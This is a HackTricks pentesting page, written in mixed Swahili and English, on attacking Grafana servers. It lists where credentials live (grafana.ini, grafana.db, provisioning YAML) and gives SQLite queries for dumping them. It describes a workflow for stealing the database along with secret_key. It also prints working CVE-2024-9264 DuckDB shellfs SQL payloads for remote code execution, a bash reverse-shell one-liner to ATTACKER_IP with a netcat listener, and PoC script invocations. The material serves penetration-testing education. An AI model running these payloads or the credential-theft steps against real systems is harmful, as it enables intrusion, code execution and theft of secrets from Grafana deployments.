Grafana

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Vitu vya Kuvutia

  • Main config is usually in /etc/grafana/grafana.ini (Deb/RPM) and can contain sensitive values such as admin_user, admin_password, secret_key, OAuth settings, SMTP creds, and renderer tokens.
  • Kwa chaguo-msingi Grafana inahifadhi data katika SQLite3 chini ya /var/lib/grafana/grafana.db.
  • Faili za provisioning ni za kuvutia sana baada ya kupata access kwenye host:
  • /etc/grafana/provisioning/datasources/*.yaml
  • /etc/grafana/provisioning/plugins/*.yaml
  • Upanuzi wa environment-variable unasaidiwa kwenye provisioning files, hivyo leaked YAML mara nyingi huonyesha siri pamoja na majina ya env var yanayounga mkono.
  • Plugins zilizowekwa mara nyingi hupatikana chini ya /var/lib/grafana/plugins.
  • Ndani ya platform unaweza kualika watu, kutengeneza API keys / service account tokens, kuorodhesha plugins, au kufunga plugins mpya kulingana na nafasi.
  • Kivinjari pia ni hazina: Grafana inafichua non-secret datasource config kwa frontend. Ikiwa una session ya Viewer (au anonymous access imewezeshwa), angalia window.grafanaBootData kutoka DevTools.

Useful SQLite checks:

.tables
.schema data_source
SELECT id,org_id,name,type,url,access,is_default,json_data FROM data_source;
SELECT id,org_id,uid,login,email,is_admin FROM user;
SELECT id,org_id,uid,name,slug FROM dashboard;

Kuiba datasources na secrets

Grafana inatofautisha usanidi unaoweza kusomwa kwenye browser kutoka kwa secrets zilizofichwa:

  • jsonData inaonekana kwa watumiaji kwenye browser na kwa kawaida inatosha kuorodhesha internal hosts, tenants, auth modes, header names, AWS regions, Elasticsearch indexes, Loki tenants, Prometheus URLs, na data nyingine ya recon kama hizo.
  • secureJsonData imefichwa kwa upande wa server na haiwezi kusomwa tena kutoka browser baada datasource kuhifadhiwa.

Post-exploitation workflow:

  1. Toa nakala ya grafana.ini na urejeshe secret_key.
  2. Kuiba grafana.db na faili za provisioning.
  3. Orodhesha datasources na usanidi wa plugin kutafuta credentials zinazoweza kutumika tena na internal endpoints.
  4. Ikiwa unahamisha au kurudia database kwenye instance nyingine ya Grafana, tumia secret_key ile ile au stored datasource passwords/tokens hazitafunguka kwa usahihi.

Why secret_key matters in newer versions:

  • Since Grafana v9, database secrets use envelope encryption.
  • Grafana inafanya encryption ya secrets kwa kutumia data encryption keys (DEKs), na DEKs hizo zimeencrypt kwa kutumia key encryption key (KEK) inayotokana na secret_key.
  • Kwa mtazamo wa mshambuliaji, grafana.db + secret_key ndiyo jozi yenye thamani ya kuibiwa.

Plugin attack surface

Chukulia plugins kama sehemu ya lengo, si kidokezo cha ziada:

  • Orodhesha kutoka filesystem, kutoka UI, au kutoka API:
curl -s http://grafana.target/api/plugins | jq '.[].id'
  • Older or third-party plugins regularly expand Grafana’s reach into internal networks because they proxy HTTP requests or interact with local files/databases.
  • Recent examples include SSRF in the Infinity plugin (< 3.4.1) and abuse paths where the Image Renderer plugin turns another bug into full-read SSRF.

CVE-2024-9264 – SQL Expressions (DuckDB shellfs) baada ya uthibitisho RCE / LFI

Grafana’s experimental SQL Expressions feature can evaluate DuckDB queries that embed user-controlled text. Insufficient sanitization allows attackers to chain DuckDB statements and load the community extension shellfs, which exposes shell commands via pipe-backed virtual files.

Impact

  • Any authenticated user with VIEWER or higher can get code execution as the Grafana OS user (often grafana; sometimes root inside a container) or perform local file reads.
  • Preconditions commonly met in real deployments:
  • SQL Expressions enabled: expressions.enabled = true
  • duckdb binary present in PATH on the server

Quick checks

  • In the UI/API, browse Admin settings (Swagger: /swagger-ui, endpoint /api/admin/settings) to confirm:
  • expressions.enabled is true
  • Optional: version, datasource types, and general hardening settings
  • Shell on host: which duckdb must resolve for the exploit path below.

Manual query pattern using DuckDB + shellfs

  • Abuse flow (2 queries):
  1. Install and load the shellfs extension, run a command, redirect combined output to a temp file via pipe
  2. Read back the temp file using read_blob

Example SQL Expressions payloads that get passed to DuckDB:

-- 1) Prepare shellfs and run command
SELECT 1; INSTALL shellfs FROM community; LOAD shellfs;
SELECT * FROM read_csv('CMD >/tmp/grafana_cmd_output 2>&1 |');
-- 2) Read the output back
SELECT content FROM read_blob('/tmp/grafana_cmd_output');

Badilisha CMD na amri unayotaka. Kwa file-read (LFI) unaweza badala yake kutumia DuckDB file functions kusoma faili za ndani.

Mfano wa reverse shell wa mstari mmoja

bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"

Weka hiyo kama CMD katika query ya kwanza ukiwa na listener: nc -lnvp 443.

PoC Otomatiki

Mfano wa matumizi

# Confirm execution context and UID
python3 CVE-2024-9264.py -u <USER> -p <PASS> -c id http://grafana.target
# Launch a reverse shell
python3 CVE-2024-9264.py -u <USER> -p <PASS> \
-c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"' \
http://grafana.target

Ikiwa matokeo yanaonyesha uid=0(root), Grafana inaendesha kama root (hii ni ya kawaida ndani ya baadhi ya containers).

2025 client-side traversal / open redirect chain

2025 Grafana client-side traversal na open-redirect chain zimeandikwa tayari kwenye kurasa za client-side za jumla. Tumia mbinu hizo dhidi ya njia maalum za Grafana kama plugin assets, dashboard script loaders, na token-rotation redirects:

Client Side Path Traversal

Open Redirect

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks